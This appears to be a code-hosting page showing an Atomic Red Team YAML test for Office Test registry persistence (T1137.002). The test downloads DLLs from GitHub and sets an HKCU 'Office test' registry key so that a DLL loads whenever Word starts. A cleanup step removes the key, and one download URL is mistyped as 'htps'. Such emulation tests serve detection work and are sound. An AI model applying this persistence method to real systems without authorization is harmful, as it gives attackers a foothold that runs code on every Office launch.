security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1137.002/T1137.002.yaml
T
Carrie Roberts 5d6df77a52 add dll and prereqs (#2273) 
Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
2023-01-10 05:42:04 -07:00

46 lines
2.4 KiB
YAML
Raw Permalink Blame History

attack_technique: T1137.002
display_name: 'Office Application Startup: Office Test'
atomic_tests:
- name: Office Application Startup Test Persistence (HKCU)
auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563
description: |
Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office
application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives.
supported_platforms:
- windows
dependencies:
- description: |
Microsoft Word must be installed
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
- description: DLL files must exist on disk at specified location
prereq_command: |
if ((Test-Path "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll") -and (Test-Path "PathToAtomicsFolder\T1137.002\bin\officetest_x86.dll")) {exit 0} else {exit 1}
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\T1137.002\bin\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.002/bin/officetest_x64.dll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll"
Invoke-Webrequest -Uri "htps://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.002/bin/officetest_x86.dll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.002\bin\officetest_x86.dll"
executor:
name: powershell
command: |
$wdApp = New-Object -COMObject "Word.Application"
if(-not $wdApp.path.contains("Program Files (x86)"))
{
Write-Host "64-bit Office"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll" /f
}
else{
Write-Host "32-bit Office"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "PathToAtomicsFolder\T1137.002\bin\officetest_x86.dll" /f
}
Stop-Process -Name "WinWord"
Start-Process "WinWord"
cleanup_command: |
Stop-Process -Name "notepad","WinWord" -ErrorAction Ignore
Remove-Item "HKCU:\Software\Microsoft\Office test\Special\Perf" -ErrorAction Ignore
Reference in New Issue View Git Blame Copy Permalink